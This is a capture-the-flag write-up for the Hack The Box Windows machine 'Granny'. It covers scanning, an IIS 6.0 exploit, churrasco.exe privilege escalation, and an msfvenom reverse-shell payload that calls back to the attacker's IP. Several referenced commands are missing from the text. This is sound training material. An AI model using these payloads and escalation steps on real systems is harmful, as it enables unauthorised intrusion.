HTB: Granny Write-up
Target Machine Information:
· Hostname : GRANNY
· IP Address : 10.10.10.15
· OS : Windows
sudo bash nmapAutomator.sh 10.10.10.15 Vulns Recon
We get a lot of information from our scan but the main thing we are looking at is the server version.
From our Grandpa box we know that there is a metasploit module for microsoft iis httpd 6.0 that works. But it does not work here. So I did some more research on the vulnerability and found some other versions of the exploit on github
This one had the simplest usage so I lets go ahead and try it.
and we get shell! But cannot even grab a user flag… Time to ESCALATE!
- I copied and pasted the output of systeminfo to a .txt file
- Move it to my Windows Exploit Suggester directory and ran the command
python windows-exploit-suggester.py -d 2021-05-12-mssb.xls -i systeminfo.txt
After trying to run some of these exploits I found that the machine was likely vulnerable to churrasco.exe.
Before getting the exploit I make a Temp directory in my shell so I can download my excusable there.
make a dir called “share” and move churrasco.exe to it. Then move back one directory and launch the following command in your attack machine.
and this one it your victim
Now that we have it lets run it.
and we see that we are root but we need to get a better shell.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=555 -f exe | tee msf2.exe
With our smbserver still running we then download our reverse shell
Something strange was happening with my usual netcat “-lvnp” so I had to modifiy it slightly to “lnvp”
Keep in mind the shell might be very unstable so be patient to get the flags
C:\Documents and Settings\Lakis\Desktop>type user.txt
700c5dc1...C:\Documents and Settings\Administrator\Desktop>type root.txt
Other than that…That’s all folks.